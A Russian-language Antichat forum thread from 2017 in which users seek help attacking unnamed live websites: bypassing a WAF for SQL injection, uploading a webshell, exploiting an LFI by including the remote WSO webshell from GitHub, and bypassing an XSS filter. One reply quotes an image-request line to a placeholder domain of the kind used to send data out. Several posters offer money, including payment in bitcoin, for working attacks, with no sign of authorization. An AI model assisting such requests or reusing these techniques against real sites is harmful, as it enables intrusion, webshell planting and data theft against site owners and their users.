ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

28.01.2017, 16:35
|
|
Guest
Сообщений: n/a
Провел на форуме: 19301
Репутация:
0
|
|
[QUOTE="SaNDER"]
SaNDER said:
↑
Error-Based SQL Injection .
WAF фильтрует concat .
*****.**/news.php?id=1 concat
|
|
|
|

28.01.2017, 23:02
|
|
Guest
Сообщений: n/a
Провел на форуме: 97114
Репутация:
24
|
|
Залить шелл в таких условиях?
Код:
Code:
$uploaddir = "img/news/";
$temp=sha1(uniqid()).".jpg";
$uploadfile = $uploaddir . $temp;
move_uploaded_file($_FILES['image']['tmp_name'], $uploadfile);
|
|
|
|

29.01.2017, 01:20
|
|
Guest
Сообщений: n/a
Провел на форуме: 169212
Репутация:
441
|
|
Сообщение от Octavian
Octavian said:
↑
Залить шелл в таких условиях?
Только в фантазиях
|
|
|
|

29.01.2017, 02:02
|
|
Guest
Сообщений: n/a
Провел на форуме: 19301
Репутация:
0
|
|
|
|
|
|

29.01.2017, 03:18
|
|
Guest
Сообщений: n/a
Провел на форуме: 19301
Репутация:
0
|
|
и еще один вопрос, есть lfi:
Код:
Code:
Warning: file_exists() expects parameter 1 to be a valid path, string given in /var/www/***/***/***.php on line 3170 Не найден файл: site_func/https://raw.githubusercontent.com/tennc/webshell/master/php/wso/wso-4.2.5.php
судя из ошибка пыхи (а пыху знаю 6 лет), в file_exists нельзя пихать строку, требуется файл на сервере, как реализовать? Еще поправка, файлы онли .php подключает.
UPD:
Кстате любой файл исполняется, а не экранируется, конфиги не получить, cms знаю, пути знаю, как извлечь инфу нужную?
Кто поможет раскрутить lfi (url не дам, только варианты пробовать буду), отбрагодарю финансово.
В ЛС могу кинуть уязвимый код на пыхе
|
|
|
|

01.02.2017, 18:17
|
|
Guest
Сообщений: n/a
Провел на форуме: 97114
Репутация:
24
|
|
|
|
|
|

02.02.2017, 18:05
|
|
Guest
Сообщений: n/a
Провел на форуме: 5299
Репутация:
0
|
|
XSS.
Задача обойти фильтр.
Пропускает исключительно
10$ в BTC за результативную помощь в внедрении кода (ЛС).
Сайт №1.
Отправляю:
Получаю:
Сайт №2
Отправляю:
Получаю
|
|
|
|

02.02.2017, 19:08
|
|
Guest
Сообщений: n/a
Провел на форуме: 169212
Репутация:
441
|
|
Синтаксис нарушен img.src = 'https://domen.com/1.gif?', возможно из-за этого парсер ломает структуру. javascript:там не нужен.
Во втором похоже на белый список атриббутов, фильтр вроде caja.
|
|
|
|

02.02.2017, 19:08
|
|
Guest
Сообщений: n/a
Провел на форуме: 169212
Репутация:
441
|
|
Прочитай любую вводную стаью про SQL Injection.
|
|
|
|

02.02.2017, 19:27
|
|
Guest
Сообщений: n/a
Провел на форуме: 1415
Репутация:
6
|
|
Сообщение от Elva
Elva said:
↑
XSS.
Задача обойти фильтр.
Пропускает исключительно
10$ в BTC за результативную помощь в внедрении кода (ЛС).
Сайт №1.
Отправляю:
Получаю:
Сайт №2
Отправляю:
Получаю
1:
со вторым не факт, что получится, он вырезает лишние параметры из тега
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|